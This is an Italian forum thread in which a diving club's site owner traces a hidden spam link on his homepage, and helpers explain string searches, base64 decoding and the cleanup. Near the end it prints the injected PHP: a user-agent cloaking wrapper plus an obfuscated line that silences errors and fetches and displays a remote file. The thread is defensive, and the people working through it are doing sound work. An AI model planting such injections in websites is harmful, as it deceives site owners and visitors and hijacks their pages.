[risolto]codice malevolo aggiunto sul mio sito

[gmtosin]

Ciao a tutti. Ho un problema sul mio sito: ho notato guardandolo con IPAD un link in fondo alla pagina principale che sicuramente mi è stato aggiunto su qualche file. Vi riporto le ultimissime righe di codice sorgente della home page:

Codice: [Seleziona]

<div style="display:none">
<li><a href="http://www.filmstramingvk.net" target="_blank">film streaming</li><>
</body>
</html>

Qualcuno di voi saprebbe dirmi su quale file posso trovare queste righe di comando per cancellarle?


il mio sito è http://www.sommozzatoribassano.it


Grazie

[giusebos]

inizia a guardare dentro il file index.php

questa è la parte di codice che devi togliere

Codice: [Seleziona]

<div style="display:none">
<li><a href="http://www.filmstramingvk.net" target="_blank">film streaming[/url]</li></div>

[giusebos]

cortesemente appena puoi inserisci il tuo codice dentro i tag code come ho fatto io , così almeno evitiamo a questi signori backlink immeritati!!!!

[gmtosin]

Ok fatto
Grazie 1000

[mmleoni]

ciao,
 in realtà non si tratta di codice malevolo, ma semplicemente di un link atto ad aumentare il pr del sito in oggetto. il sito non è più on line.

ciò che volevo dirti è che sarebbe opportuno chiedersi come abbiano fatto ad inserire quel link, e nel frattempo mi sono accorto che il link è ancora presente. da dove è che lo hai tolto?

comunque la domanda non è mai come lo tolgo, ma come lo hanno messo. purtroppo la risposta è spesso difficile da trovare per chi non sia del mestiere.

ciao,
marco

[gmtosin]

Ciao, il codice lo devo ancora trovare, non è su index.php
Ho corretto solo il post come richiesto.
Evidentemente devo aumentare la sicurezza del sito. Sono un autodidatta 100% e quindi molte cose ancora mi sfuggono. Suggerimenti?
Grazie per l'interessamento

[mmleoni]

di solito è nella index del template in uso, potrebbe anche essere che fosse lì sin dall'inizio. alcuni template gratuiti hanno dei link nascosti.

potresti partire con il leggere i topic di apertura della sezione.

ciao,
marco

[gmtosin]

Ciao,
ho passato tutti i file .PHP ma non sono riuscito a trovare la stringa del Link.
Avete qualche altra idea? C'è uno strumento che mi saprebbe indicare il file sorgente di quel pezzo di codice?


 


Grazie a tutti
ciao

[giusebos]

quel link, che non è altro che un testo può solo essere in 2 posti
fra i file fisici della tua installazione , tutto quello che c'è nella root del tuo sito,
oppure nel file del database.

per trovare la stringa all'interno di una serie di file che sono all'interno di altre cartelle, puoi provare ad usare note++ e pspad, due editor di testo gratuiti che hanno al loro in terno una funzione che cerca una determinata stringa, o parte di essa dentro una lunga serie di file.

ma se il file fosse nel database perchè magari inserito in un articolo o modulo?

fai la stessa ricerca, ma questa volta la fai da phpmyadmin, con lo strumento cerca

potrebbe non bastare, alcuni furbacchioni potrebbero aver inserito una stringa codificata, una serie di numeri e lettere che come risultato da un link o altro testo, la codifica più usare è base64, e ad esempio una stringa con:

Codice: [Seleziona]

href="http://www.pippo.org/">pippoviene codificata in

Codice: [Seleziona]

aHJlZj0iaHR0cDovL3d3dy5waXBwby5vcmcvIj5waXBwbw==
eventualmente si prospettasse questa terza possibilità, esistono strumenti on line per la codifica decodifica di stringhe base64

percodificare:www.base64encode.org/
per decodificare:www.base64decode.org/

[gmtosin]

Infatti ho usato note++ per scansionare tutti i file. Credo però di aver visto qualcosa di simile quello che descrivi come base64. Cerco e poi vi faccio sapere.
Grazie 1000 ancora

[gmtosin]

Per il momento ho trovato questo ma non so cosa cancellare:

Codice: [Seleziona]

<p>asd SOMMOZZATORI BASSANO via Porto di Brenta, 5 36061 Bassano del Grappa - VI</p>


<p>info@sommozzatoribassano.it</p>


<p>C.F. 91037150249</p>


<p>Copyright © Sommozzatori Bassano 2012. All Rights Reserved.</p>
<div class="cleared"><>




                    <?php echo str_replace('%YEAR%', date('Y'), ob_get_clean()); ?>
                    <?php endif; ?>
                <>
        <div class="cleared"><>
    <>
<>


<div class="cleared"><>
    <>
<>


    <div class="cleared"><>
<>


<?php echo $view->position('debug'); ?>
<?php $agent=str_replace(" ","",$_SERVER['HTTP_USER_AGENT']); if(stristr($agent,"MSIE") || stristr($agent,"Opera") || stristr($agent,"Firefox") || stristr($agent,"Chrome")) { echo '<div style="display:none">';} ?>
<?php error_reporting(0);@print(file_get_contents(base64_decode("aHR0cDovL3d3dy5wb3JudmlkbWVkaWEuY29tL2l0LnR4dA==")));?>
<>
</body>
</html>


[giusebos]

ti ho dato i link per decodificare quella stringa.
incolla su encode e vedi...

[gmtosin]

Ok , ho cancellato la riga con base64. Spero di non avere cancellato parti buone del codice. Adesso funziona tutto bene.. Ho sostituito tutte le password del sito e delle e-mail. Grazie. Posso chiudere il topic . Ciao

[mmleoni]

Ok , ho cancellato la riga con base64. Spero di non avere cancellato parti buone del codice.

no, non hai cancellato parti utili del codice; la riga in questione disabilitava la segnalazione degli errori e tentava di caricare un file da un server remoto per visualizzarlo a video.

anche la riga sopra fa parte dell'hack: serve a nascondere il link alla vista quando la pagina viene letta da un browser ma non agisce se si tratta del bot di un motore di ricerca.
ma senza vedere la pagina e con il codice postato mancante di diverse chiusure non so dirti dove è, se c'è, il tag di chiusura del div aperto sopra, quindi lasciala pure lì... 

ps: per chiudere il topic devi aggiungere [risolto] davanti al titolo del post di apertura del topic.

ciao